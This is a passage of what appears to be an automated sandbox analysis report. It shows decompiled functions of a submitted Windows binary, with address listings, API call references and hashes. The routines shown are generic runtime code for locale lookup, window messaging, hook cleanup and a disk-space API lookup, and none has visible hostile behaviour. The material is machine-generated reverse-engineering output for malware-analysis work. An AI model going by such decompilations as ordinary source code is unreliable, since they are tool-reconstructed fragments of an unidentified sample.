                                                                                                                                                                                          0x00415574
                                                                                                                                                                                          0x0041557b
                                                                                                                                                                                          0x0041557e
                                                                                                                                                                                          0x00415581
                                                                                                                                                                                          0x0041558e
                                                                                                                                                                                          0x004154b0
                                                                                                                                                                                          0x004154ba
                                                                                                                                                                                          0x0041552a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004154bc
                                                                                                                                                                                          0x004154bf
                                                                                                                                                                                          0x004154c0
                                                                                                                                                                                          0x004154c7
                                                                                                                                                                                          0x004154c8
                                                                                                                                                                                          0x004154cd
                                                                                                                                                                                          0x004154d0
                                                                                                                                                                                          0x004154d3
                                                                                                                                                                                          0x004154dd
                                                                                                                                                                                          0x004154e8
                                                                                                                                                                                          0x004154f7
                                                                                                                                                                                          0x004154f9
                                                                                                                                                                                          0x004154f9
                                                                                                                                                                                          0x00415500
                                                                                                                                                                                          0x00415503
                                                                                                                                                                                          0x00415506
                                                                                                                                                                                          0x00415513
                                                                                                                                                                                          0x00415513
                                                                                                                                                                                          0x004154ba
                                                                                                                                                                                          0x0041548c
                                                                                                                                                                                          0x0041548c
                                                                                                                                                                                          0x00415799
                                                                                                                                                                                          0x0041579d
                                                                                                                                                                                          0x0041579d
                                                                                                                                                                                          0x0041548a

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 004154C0
                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 004155D6
                                                                                                                                                                                            • Part of subcall function 0041713C: RtlEnterCriticalSection.KERNEL32(0049E828,?,?,?,?,?,004109C7,?,?,?,004109FA,0041075A), ref: 00417172
                                                                                                                                                                                            • Part of subcall function 0041713C: RtlLeaveCriticalSection.KERNEL32(0049E828,004171EB,?,0049E828,?,?,?,?,?,004109C7,?,?,?,004109FA,0041075A), ref: 004171DE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalInitSectionVariant$EnterLeave
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2777075435-0
                                                                                                                                                                                          • Opcode ID: 3a00737a6e7866ca1e46b08d7b8799e286f72b28df91e760b7781465da846996
                                                                                                                                                                                          • Instruction ID: a24615229599b446cf83ad5ef8fc14772df329521493faa61475ffe7701a7f51
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a00737a6e7866ca1e46b08d7b8799e286f72b28df91e760b7781465da846996
                                                                                                                                                                                          • Instruction Fuzzy Hash: D8B16D79A00609EFDB00EF94C5818EDB7B5FF89714F9040A6E804A7751D738AEC5CB68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0045A390 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0045A390(void* __eax, void* __ecx, struct HWND__** __edx) {
				intOrPtr _t11;
				intOrPtr _t20;
				void* _t30;
				void* _t31;
				void* _t33;
				struct HWND__** _t34;
				struct HWND__* _t35;
				struct HWND__* _t36;

				_t31 = __ecx;
				_t34 = __edx;
				_t33 = __eax;
				_t30 = 0;
				_t11 =  *((intOrPtr*)(__edx + 4));
				if(_t11 < 0x100 || _t11 > 0x108) {
					L16:
					return _t30;
				} else {
					_t35 = GetCapture();
					if(_t35 != 0) {
						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x49e668 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
					_t36 =  *_t34;
					_t2 = _t33 + 0x44; // 0x0
					_t20 =  *_t2;
					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
						L7:
						if(E00437E5C(_t36, _t31) == 0 && _t36 != 0) {
							_t36 = GetParent(_t36);
							goto L7;
						}
						if(_t36 == 0) {
							_t36 =  *_t34;
						}
						goto L11;
					} else {
						_t36 = E00441704(_t20);
						L11:
						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
				}
			}











                                                                                                                                                                                          0x0045a390
                                                                                                                                                                                          0x0045a394
                                                                                                                                                                                          0x0045a396
                                                                                                                                                                                          0x0045a398
                                                                                                                                                                                          0x0045a39a
                                                                                                                                                                                          0x0045a3a2
                                                                                                                                                                                          0x0045a441
                                                                                                                                                                                          0x0045a447
                                                                                                                                                                                          0x0045a3b3
                                                                                                                                                                                          0x0045a3b8
                                                                                                                                                                                          0x0045a3bc
                                                                                                                                                                                          0x0045a422
                                                                                                                                                                                          0x0045a43f
                                                                                                                                                                                          0x0045a43f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045a422
                                                                                                                                                                                          0x0045a3be
                                                                                                                                                                                          0x0045a3c0
                                                                                                                                                                                          0x0045a3c0
                                                                                                                                                                                          0x0045a3c5
                                                                                                                                                                                          0x0045a3e0
                                                                                                                                                                                          0x0045a3e9
                                                                                                                                                                                          0x0045a3de
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045a3de
                                                                                                                                                                                          0x0045a3f1
                                                                                                                                                                                          0x0045a3f3
                                                                                                                                                                                          0x0045a3f3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045a3cf
                                                                                                                                                                                          0x0045a3d4
                                                                                                                                                                                          0x0045a3f5
                                                                                                                                                                                          0x0045a40e
                                                                                                                                                                                          0x0045a410
                                                                                                                                                                                          0x0045a410
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045a40e
                                                                                                                                                                                          0x0045a3c5

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCapture.USER32 ref: 0045A3B3
                                                                                                                                                                                          • SendMessageA.USER32(00000000,-0000BBEE,0049ABD1,?), ref: 0045A407
                                                                                                                                                                                          • GetWindowLongA.USER32 ref: 0045A417
                                                                                                                                                                                          • SendMessageA.USER32(00000000,-0000BBEE,0049ABD1,?), ref: 0045A436
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$CaptureLongWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1158686931-0
                                                                                                                                                                                          • Opcode ID: 5b89e33d5f33cfaebd5b1cc37b20e9e534ad05d39b8e2e3f38a1a5aac5179a0b
                                                                                                                                                                                          • Instruction ID: 3b7db6bc04ec6c9b9a315d118ec06550147a56b28b89c41b1f9545d3d98f8dbc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b89e33d5f33cfaebd5b1cc37b20e9e534ad05d39b8e2e3f38a1a5aac5179a0b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 491193712042095F9620FA9DC884F1373CC9B15319B10453AFD59C3343EAACFC54826B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040CBEC Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                          			E0040CBEC(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x40cc83);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E0040C964(GetThreadLocale(), 0x40cc98, 0x100b,  &_v8);
				_t29 = E00409664(0x40cc98, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E0040CB38, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x49e770;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(0x40cb74, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0040CC8A);
				return E004049C0( &_v8);
			}










                                                                                                                                                                                          0x0040cbec
                                                                                                                                                                                          0x0040cbef
                                                                                                                                                                                          0x0040cbf4
                                                                                                                                                                                          0x0040cbf5
                                                                                                                                                                                          0x0040cbfa
                                                                                                                                                                                          0x0040cbfd
                                                                                                                                                                                          0x0040cc13
                                                                                                                                                                                          0x0040cc25
                                                                                                                                                                                          0x0040cc2f
                                                                                                                                                                                          0x0040cc3f
                                                                                                                                                                                          0x0040cc44
                                                                                                                                                                                          0x0040cc49
                                                                                                                                                                                          0x0040cc4e
                                                                                                                                                                                          0x0040cc4e
                                                                                                                                                                                          0x0040cc54
                                                                                                                                                                                          0x0040cc57
                                                                                                                                                                                          0x0040cc57
                                                                                                                                                                                          0x0040cc68
                                                                                                                                                                                          0x0040cc68
                                                                                                                                                                                          0x0040cc6f
                                                                                                                                                                                          0x0040cc72
                                                                                                                                                                                          0x0040cc75
                                                                                                                                                                                          0x0040cc82

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(?,00000000,0040CC83,?,?,00000000), ref: 0040CC04
                                                                                                                                                                                            • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040CC83,?,?,00000000), ref: 0040CC34
                                                                                                                                                                                          • EnumCalendarInfoA.KERNEL32(Function_0000CB38,00000000,00000000,00000004), ref: 0040CC3F
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,00000003,Function_0000CB38,00000000,00000000,00000004,00000000,0040CC83,?,?,00000000), ref: 0040CC5D
                                                                                                                                                                                          • EnumCalendarInfoA.KERNEL32(0040CB74,00000000,00000000,00000003), ref: 0040CC68
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4102113445-0
                                                                                                                                                                                          • Opcode ID: 902988a0099969183d8a3a73948f8a6bf1cf9f07a1a6714f5175c9c2e886427b
                                                                                                                                                                                          • Instruction ID: 1afeb0ae3c984d7c4f1a7fc68b04595db4598325ea28b3ac7f3617db3f710194
                                                                                                                                                                                          • Opcode Fuzzy Hash: 902988a0099969183d8a3a73948f8a6bf1cf9f07a1a6714f5175c9c2e886427b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 70014270608204EBF701A7B5DD43F5E725CDB46B18F610737B900BA2C0D63CAE00826D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00458FB8 Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00458FB8() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0x49ebd0 != 0) {
					_t10 =  *0x49ebd0; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x49ebd0 = 0;
				if( *0x49ebd4 != 0) {
					_t2 =  *0x49ebcc; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0x49ebc8) {
						_t8 =  *0x49ebd4; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0x49ebd4; // 0x0
					CloseHandle(_t5);
					 *0x49ebd4 = 0;
					return 0;
				}
				return 0;
			}







                                                                                                                                                                                          0x00458fbf
                                                                                                                                                                                          0x00458fc1
                                                                                                                                                                                          0x00458fc7
                                                                                                                                                                                          0x00458fc7
                                                                                                                                                                                          0x00458fce
                                                                                                                                                                                          0x00458fda
                                                                                                                                                                                          0x00458fdc
                                                                                                                                                                                          0x00458fe2
                                                                                                                                                                                          0x00458ff2
                                                                                                                                                                                          0x00458ff6
                                                                                                                                                                                          0x00458ffc
                                                                                                                                                                                          0x00458ffc
                                                                                                                                                                                          0x00459001
                                                                                                                                                                                          0x00459007
                                                                                                                                                                                          0x0045900e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045900e
                                                                                                                                                                                          0x00459013

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • UnhookWindowsHookEx.USER32(00000000), ref: 00458FC7
                                                                                                                                                                                          • SetEvent.KERNEL32(00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00458FE2
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00458FE7
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00458FFC
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00459007
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2429646606-0
                                                                                                                                                                                          • Opcode ID: 7fd3c2e6dc8ae750e94a7f2d7be103522667448ec58a17d1e6ff86980fbe391f
                                                                                                                                                                                          • Instruction ID: 3bc59d0302d60dcdb639d85b4c22765180d6681b902288d708a5b48c4f0846c4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7fd3c2e6dc8ae750e94a7f2d7be103522667448ec58a17d1e6ff86980fbe391f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9CF0ACB1905100EAC750EBBBED49A063395A724315F000A3BB112D71E1D73CF884CB1E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040CC9B Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                          			E0040CC9B(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v117;
				void* _t43;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				signed int _t53;
				intOrPtr _t77;
				void* _t78;
				signed int _t79;
				signed int _t85;
				signed int _t94;
				intOrPtr _t113;
				void* _t124;
				void* _t126;
				intOrPtr _t129;
				intOrPtr _t130;

				_t1 =  &_v117;
				 *_t1 = _v117 + __edx;
				_t130 =  *_t1;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t124 = __edx;
				_t126 = __eax;
				_push(_t129);
				_push(0x40ce66);
				_push( *[fs:eax]);
				 *[fs:eax] = _t129;
				_t94 = 1;
				E004049C0(__edx);
				E0040C964(GetThreadLocale(), 0x40ce7c, 0x1009,  &_v12);
				if(E00409664(0x40ce7c, 1, _t130) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t43 = E00404C80(_t126);
						__eflags = _t94 - _t43;
						if(_t94 > _t43) {
							goto L29;
						}
						__eflags =  *(_t126 + _t94 - 1) & 0x000000ff;
						asm("bt [0x49b134], eax");
						if(( *(_t126 + _t94 - 1) & 0x000000ff) >= 0) {
							_t47 = E0040A0C8(_t126 + _t94 - 1, 2, 0x40ce80);
							__eflags = _t47;
							if(_t47 != 0) {
								_t49 = E0040A0C8(_t126 + _t94 - 1, 4, 0x40ce90);
								__eflags = _t49;
								if(_t49 != 0) {
									_t51 = E0040A0C8(_t126 + _t94 - 1, 2, 0x40cea8);
									__eflags = _t51;
									if(_t51 != 0) {
										_t53 =  *(_t126 + _t94 - 1) - 0x59;
										__eflags = _t53;
										if(_t53 == 0) {
											L25:
											E00404C88(_t124, 0x40cec0);
										} else {
											__eflags = _t53 != 0x20;
											if(_t53 != 0x20) {
												E00404BA8();
												E00404C88(_t124, _v24);
											} else {
												goto L25;
											}
										}
									} else {
										E00404C88(_t124, 0x40ceb4);
										_t94 = _t94 + 1;
									}
								} else {
									E00404C88(_t124, 0x40cea0);
									_t94 = _t94 + 3;
								}
							} else {
								E00404C88(_t124, 0x40ce8c);
								_t94 = _t94 + 1;
							}
							_t94 = _t94 + 1;
							__eflags = _t94;
						} else {
							_v8 = E0040DD78(_t126, _t94);
							E00404EE0(_t126, _v8, _t94,  &_v20);
							E00404C88(_t124, _v20);
							_t94 = _t94 + _v8;
						}
					}
				} else {
					_t77 =  *0x49e748; // 0x9
					_t78 = _t77 - 4;
					if(_t78 == 0 || _t78 + 0xfffffff3 - 2 < 0) {
						_t79 = 1;
					} else {
						_t79 = 0;
					}
					if(_t79 == 0) {
						E00404A14(_t124, _t126);
					} else {
						while(_t94 <= E00404C80(_t126)) {
							_t85 =  *(_t126 + _t94 - 1) - 0x47;
							__eflags = _t85;
							if(_t85 != 0) {
								__eflags = _t85 != 0x20;
								if(_t85 != 0x20) {
									E00404BA8();
									E00404C88(_t124, _v16);
								}
							}
							_t94 = _t94 + 1;
							__eflags = _t94;
						}
					}
				}
				L29:
				_pop(_t113);
				 *[fs:eax] = _t113;
				_push(E0040CE6D);
				return E004049E4( &_v24, 4);
			}
























                                                                                                                                                                                          0x0040cc9b
                                                                                                                                                                                          0x0040cc9b
                                                                                                                                                                                          0x0040cc9b
                                                                                                                                                                                          0x0040cca1
                                                                                                                                                                                          0x0040cca2
                                                                                                                                                                                          0x0040cca3
                                                                                                                                                                                          0x0040cca4
                                                                                                                                                                                          0x0040cca5
                                                                                                                                                                                          0x0040cca9
                                                                                                                                                                                          0x0040ccab
                                                                                                                                                                                          0x0040ccaf
                                                                                                                                                                                          0x0040ccb0
                                                                                                                                                                                          0x0040ccb5
                                                                                                                                                                                          0x0040ccb8
                                                                                                                                                                                          0x0040ccbb
                                                                                                                                                                                          0x0040ccc2
                                                                                                                                                                                          0x0040ccda
                                                                                                                                                                                          0x0040ccf2
                                                                                                                                                                                          0x0040ce3c
                                                                                                                                                                                          0x0040ce3e
                                                                                                                                                                                          0x0040ce43
                                                                                                                                                                                          0x0040ce45
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040cd5b
                                                                                                                                                                                          0x0040cd60
                                                                                                                                                                                          0x0040cd67
                                                                                                                                                                                          0x0040cda5
                                                                                                                                                                                          0x0040cdaa
                                                                                                                                                                                          0x0040cdac
                                                                                                                                                                                          0x0040cdcb
                                                                                                                                                                                          0x0040cdd0
                                                                                                                                                                                          0x0040cdd2
                                                                                                                                                                                          0x0040cdf3
                                                                                                                                                                                          0x0040cdf8
                                                                                                                                                                                          0x0040cdfa
                                                                                                                                                                                          0x0040ce0f
                                                                                                                                                                                          0x0040ce0f
                                                                                                                                                                                          0x0040ce11
                                                                                                                                                                                          0x0040ce17
                                                                                                                                                                                          0x0040ce1e
                                                                                                                                                                                          0x0040ce13
                                                                                                                                                                                          0x0040ce13
                                                                                                                                                                                          0x0040ce15
                                                                                                                                                                                          0x0040ce2c
                                                                                                                                                                                          0x0040ce36
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040ce15
                                                                                                                                                                                          0x0040cdfc
                                                                                                                                                                                          0x0040ce03
                                                                                                                                                                                          0x0040ce08
                                                                                                                                                                                          0x0040ce08
                                                                                                                                                                                          0x0040cdd4
                                                                                                                                                                                          0x0040cddb
                                                                                                                                                                                          0x0040cde0
                                                                                                                                                                                          0x0040cde0
                                                                                                                                                                                          0x0040cdae
                                                                                                                                                                                          0x0040cdb5
                                                                                                                                                                                          0x0040cdba
                                                                                                                                                                                          0x0040cdba
                                                                                                                                                                                          0x0040ce3b
                                                                                                                                                                                          0x0040ce3b
                                                                                                                                                                                          0x0040cd69
                                                                                                                                                                                          0x0040cd72
                                                                                                                                                                                          0x0040cd80
                                                                                                                                                                                          0x0040cd8a
                                                                                                                                                                                          0x0040cd8f
                                                                                                                                                                                          0x0040cd8f
                                                                                                                                                                                          0x0040cd67
                                                                                                                                                                                          0x0040ccf8
                                                                                                                                                                                          0x0040ccf8
                                                                                                                                                                                          0x0040ccfd
                                                                                                                                                                                          0x0040cd00
                                                                                                                                                                                          0x0040cd0e
                                                                                                                                                                                          0x0040cd0a
                                                                                                                                                                                          0x0040cd0a
                                                                                                                                                                                          0x0040cd0a
                                                                                                                                                                                          0x0040cd12
                                                                                                                                                                                          0x0040cd4d
                                                                                                                                                                                          0x0040cd14
                                                                                                                                                                                          0x0040cd39
                                                                                                                                                                                          0x0040cd1a
                                                                                                                                                                                          0x0040cd1a
                                                                                                                                                                                          0x0040cd1c
                                                                                                                                                                                          0x0040cd1e
                                                                                                                                                                                          0x0040cd20
                                                                                                                                                                                          0x0040cd29
                                                                                                                                                                                          0x0040cd33
                                                                                                                                                                                          0x0040cd33
                                                                                                                                                                                          0x0040cd20
                                                                                                                                                                                          0x0040cd38
                                                                                                                                                                                          0x0040cd38
                                                                                                                                                                                          0x0040cd38
                                                                                                                                                                                          0x0040cd44
                                                                                                                                                                                          0x0040cd12
                                                                                                                                                                                          0x0040ce4b
                                                                                                                                                                                          0x0040ce4d
                                                                                                                                                                                          0x0040ce50
                                                                                                                                                                                          0x0040ce53
                                                                                                                                                                                          0x0040ce65

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(?,00000000,0040CE66,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040CCCB
                                                                                                                                                                                            • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Locale$InfoThread
                                                                                                                                                                                          • String ID: eeee$ggg$yyyy
                                                                                                                                                                                          • API String ID: 4232894706-1253427255
                                                                                                                                                                                          • Opcode ID: 9191c9879dea40f736bf73c20b674cee613bd0160eddf7d7746c10fd9ee08262
                                                                                                                                                                                          • Instruction ID: 2e720ce56c3cbae91f014b01323dee42bd74278122ec998d6dbf5ed7d294af69
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9191c9879dea40f736bf73c20b674cee613bd0160eddf7d7746c10fd9ee08262
                                                                                                                                                                                          • Instruction Fuzzy Hash: CA4105B0314504CBE711AB7AC8C12BEB69ADF85304BA1463BE542B37C1D63CED0782AD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040E884 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040E884() {
				_Unknown_base(*)()* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x49b158 = _t1;
				}
				if( *0x49b158 == 0) {
					_t2 =  &M00409ED4;
					 *0x49b158 = _t2;
					return _t2;
				}
				return _t1;
			}






                                                                                                                                                                                          0x0040e88a
                                                                                                                                                                                          0x0040e88f
                                                                                                                                                                                          0x0040e893
                                                                                                                                                                                          0x0040e89b
                                                                                                                                                                                          0x0040e8a0
                                                                                                                                                                                          0x0040e8a0
                                                                                                                                                                                          0x0040e8ac
                                                                                                                                                                                          0x0040e8ae
                                                                                                                                                                                          0x0040e8b3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040e8b3
                                                                                                                                                                                          0x0040e8b9

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0040E88A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040E89B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
